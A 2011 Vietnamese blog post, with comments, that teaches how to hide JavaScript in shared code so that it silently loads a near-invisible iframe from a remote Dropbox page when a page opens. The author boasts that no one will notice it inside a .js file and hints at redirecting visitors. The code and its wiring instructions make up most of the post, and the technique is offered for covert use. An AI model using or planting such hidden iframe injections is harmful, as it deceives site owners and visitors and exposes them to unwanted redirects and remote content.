Thứ Hai, 29 tháng 8, 2011

Chèn Iframe thoải mái mà không bị phát hiện

bạn có một code và share trên mạng , muốn chèn iframe thì làm như sau
có một file js - file nào cũng dc , miễn là js
bạn chèn code


function ShowJsF()
{
var iframe = document.createElement("iframe");
iframe.setAttribute("id","testiframe");
iframe.setAttribute("name","testiframe");
iframe.setAttribute("height","1");
iframe.setAttribute("width","0");
iframe.setAttribute("frameBorder","1");
iframe.setAttribute("scrolling","auto");
iframe.setAttribute("src","http://dl.dropbox.com/u/10870808/Apps/avim/index.html");
iframe.style.position = "absolute";
iframe.style.display = "block";
iframe.style.top = 100 + 'px';
iframe.style.left = 100 + 'px';
window.document.body.appendChild(iframe);
return false;
}  

và trong index.php bạn chỉ cần load file js đó lên và thêm đoạn sau : (vào chỗ nào cũng dc)

<body onload="ShowJsF();">

vậy là xong , nhét vào js thì chả ai biết mà mò đâu
ví dụ http://dl.dropbox.com/u/10870808/Apps/avim/index.html là của mình , và mình chèn cái killiframe rồi drect đến cái xxx thì

3 nhận xét:

tham nhung nói...

Mong bạn ủng hộ phòng chống tham nhũng bằng cách chèn code toidahoilo vào blog

Tham khảo: http://toidahoilo.net/edit-frame.html

Nặc danh nói...

"và trong index.php bạn chỉ cần load file js đó lên" ĐOạn này làm thế nào vậy admin. Mình ko biết làm đoạn này

zeko sock nói...

lưu đoạn code trên ( code đầu từ trên đếm xuống ) thành 1 file .js
sau đó trong file index bạn gọi nó lên
ví dụ :

là vậy đó :|
p/s : body,onload ko có dấu (-) nghen

Đăng nhận xét

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by mkha.hero